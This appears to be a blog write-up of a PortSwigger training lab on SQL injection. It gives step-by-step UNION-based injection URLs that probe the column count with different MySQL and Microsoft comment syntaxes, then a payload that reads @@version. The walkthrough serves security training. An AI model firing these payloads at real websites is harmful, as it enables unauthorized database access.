Home πŸ•ΈοΈ PSA - SQLi 8 - Querying DB type and version on MySQL and Microsoft
Post
Cancel

πŸ•ΈοΈ PSA - SQLi 8 - Querying DB type and version on MySQL and Microsoft

Posted May 16, 2023 Updated Sep 28, 2024
By blueh0rse
1 min read

Difficulty : Practitioner

🎯 Goal

To solve the lab, display the database version string.

βœ… Solution

We know it is a MySQL or Microsoft database so we will have to try different comment symbol: --comment for Microsoft #comment or -- comment for MySQL The # will be encoded as %23 and the space `` as %20

Find the number of columns while trying different comments:

1
2
3
4
5
6
7
8
9
10
11
12

# Microsoft: --comment
<website>/filter?category=Gifts'UNION SELECT NULL--                 # error! 
<website>/filter?category=Gifts'UNION SELECT NULL,NULL--            # error! 
<website>/filter?category=Gifts'UNION SELECT NULL,NULL,NULL--       # error! 
# MySQL: #comment
<website>/filter?category=Gifts'UNION SELECT NULL%23                # error! 
<website>/filter?category=Gifts'UNION SELECT NULL,NULL%23           # works  
<website>/filter?category=Gifts'UNION SELECT NULL,NULL,NULL%23      # error! 
# MySQL: -- comment
<website>/filter?category=Gifts'UNION SELECT NULL--%20              # error! 
<website>/filter?category=Gifts'UNION SELECT NULL,NULL--%20         # works  
<website>/filter?category=Gifts'UNION SELECT NULL,NULL,NULL--%20    # error!

We know 2 columns are returned by the questy. Is one containing string?

1

<website>/filter?category=Gifts'UNION SELECT 'abc',NULL--%20        # works

To determine the database type and version on MySQL we have to query @@version. The @ character is %40 when URL encoded.

Full payload:

1

<website>/filter?category=Gifts'+UNION+SELECT+%40%40version,NULL--%20    # works

The database type and version are displayed.

PortSwigger, SQLi
portswigger web sqli
This post is licensed under GNU GPLv3 by the author.
Recently Updated
Contents